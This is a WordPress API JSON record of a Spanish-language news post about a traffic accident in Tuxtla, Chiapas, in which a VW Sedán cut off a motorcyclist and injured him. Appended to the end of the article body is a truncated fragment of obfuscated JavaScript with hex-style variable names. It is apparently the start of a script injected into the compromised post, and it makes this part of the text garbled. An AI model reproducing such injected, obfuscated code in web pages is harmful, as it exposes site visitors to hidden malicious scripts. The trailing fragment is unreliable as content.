{"id":381,"date":"2022-03-09T04:36:33","date_gmt":"2022-03-09T04:36:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=381"},"modified":"2022-03-09T04:36:34","modified_gmt":"2022-03-09T04:36:34","slug":"escarabajo-protagoniza-fuerte-accidente-de-transito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=381","title":{"rendered":"Escarabajo protagoniza fuerte accidente de tr\u00e1nsito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0028-1024x577.jpg\" alt=\"\" class=\"wp-image-382\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0028-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0028-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0028-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0028-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220308-WA0028.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 8 de marzo del 2022. &#8211; El conductor de un Vw Sed\u00e1n (Vocho) protagoniz\u00f3 un fuerte accidente de tr\u00e1nsito en la Calzada al Sumidero de Tuxtla, dejando como saldo un motociclista herido.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, cerca de las 8 de la noche un motociclista circulaba en esta v\u00eda a la altura de la Colonia Albania Baja en el carril de Sur a Norte cuando el Vw hizo corte de circulaci\u00f3n al dar vuelta en un retorno.<\/p>\n\n\n\n<p>La Italika de color rojo con negro se estrell\u00f3 y el conductor sali\u00f3 volando y termin\u00f3 herido.<\/p>\n\n\n\n<p>El chofer del vocho dijo que el motociclista hizo una mala maniobra para rebasar y se produjo el impacto.<\/p>\n\n\n\n<p>Param\u00e9dicos arribaron para atender y trasladar al motociclista a un nosocomio.<\/p>\n\n\n\n<p>Las dos unidades fueron trasladadas ante las autoridades competentes para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 8 de marzo del 2022. &#8211; El conductor de un Vw Sed\u00e1n (Vocho) protagoniz\u00f3 un fuerte accidente de tr\u00e1nsito en la Calzada al Sumidero de Tuxtla, dejando como saldo un motociclista herido. Los reportes de tr\u00e1nsito informaron que, cerca de las 8 de la noche un motociclista circulaba en esta v\u00eda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":382,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-381","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=381"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/381\/revisions"}],"predecessor-version":[{"id":383,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/381\/revisions\/383"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/382"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}